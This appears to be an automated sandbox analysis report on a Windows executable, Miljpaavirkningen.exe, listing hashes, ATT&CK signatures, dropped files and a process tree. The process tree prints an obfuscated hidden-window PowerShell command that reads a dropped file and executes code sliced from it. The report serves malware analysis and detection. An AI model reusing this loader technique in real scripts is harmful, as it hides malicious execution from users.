Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    22-10-2024 16:08

General

  • Target

    Miljpaavirkningen.exe

  • Size

    895KB

  • MD5

    0327d3ca2373bdcfad29ae18a7554884

  • SHA1

    92ce0598c98f0ddc2ae136491f0e988ddcf29d49

  • SHA256

    eb60de90ee98dcc76c344d75d96f2eb72bd4466a504f2668a660ec928abf07e1

  • SHA512

    efdd810fab7b956116a99ba2d78e723474e14343c8cd5cde01ae8cb61a441aad14f516a151c530b42b7b8b1760405ca87c9415cbf53a541190c92e2250c751ee

  • SSDEEP

    12288:N5e/L/ujA9jjzAmiTs3QCXDzo3vKz/oByv268ODurlKRFP7Pytafm6wY8yujWX6d:abu0wmt43w/9268OD6lm7Pytae6/B1G5

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)

    Runs PowerShell with a hidden display window.

  • Drops file in Windows directory (4 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (8 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe
    "C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2440
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1784
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2348

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Damascenere.lnk

    Filesize

    803B

    MD5

    47027ef7e3a1709e131ffb08a50b6be2

    SHA1

    1516a214287a748dd3e02d73d8373a0baeddf352

    SHA256

    4997726a61b3c10d6a7ed878463f680007b13dcd9533aa310b28888967d17d32

    SHA512

    90d60995db3dca664f59a3780e7b141bc66fee80034d0372e2e8e90baf6acbc6ed8ca6da25e8d937a24b4aec057c260762fd351e4dd73f1a7aa179a4d87298ff

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Damascenere.lnk

    Filesize

    849B

    MD5

    68f169ee1b757b8cb3fd66b93b245af7

    SHA1

    79eca9a98803d71953c27c6a6768283ee4fc632e

    SHA256

    6a308dc4a480f127088ad672a858e09d50d64e63af14078136a80ba62c3dab69

    SHA512

    3655c18733e86e6011b7b33c24a4ce816d16197d958a4906790b2d94e979730c50a2f4d17a0037ccf0ed828cd403cb144eb913d80376355ded94752b43561d23

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    5332cfad5e06f4af65d0cccf541224cf

    SHA1

    acaa9c5e63e880690fb03979b3a2e152db600a55

    SHA256

    b515fe43377ba9c68edf2f6ad21d150d7f5561fbdc23bd0bb634076243a8283f

    SHA512

    55c220f2e86dd69fbe12aaef80a86d9aa44564d1d6d41f040b3944ba73abdbc57f27b09f0c2b84ead6690db15977f14b3b95135ddca1ed3aac45812c23525dde

  • C:\Windows\Resources\Nebengeschfter.ini

    Filesize

    32B

    MD5

    53898e643bd3e0ca22a462325ad62da4

    SHA1

    e0f08a75fa5219f39e49c1b9f361119905da7d02

    SHA256

    b947991000aea669ebfeadfb12de45121d46ad3dfd02296f373f9bf8ce4f1aff

    SHA512

    aa17b99a93a04f7bbbb92f34c15921da80e20592a39b3921f1d3cc59fae55f66196b2be4f56716846daff041253cb63d7e373b84234d451181c87f1d097fe8ca

  • memory/1784-169-0x0000000074261000-0x0000000074262000-memory.dmp

    Filesize

    4KB

  • memory/1784-170-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/1784-171-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/1784-174-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/1784-175-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/1784-328-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB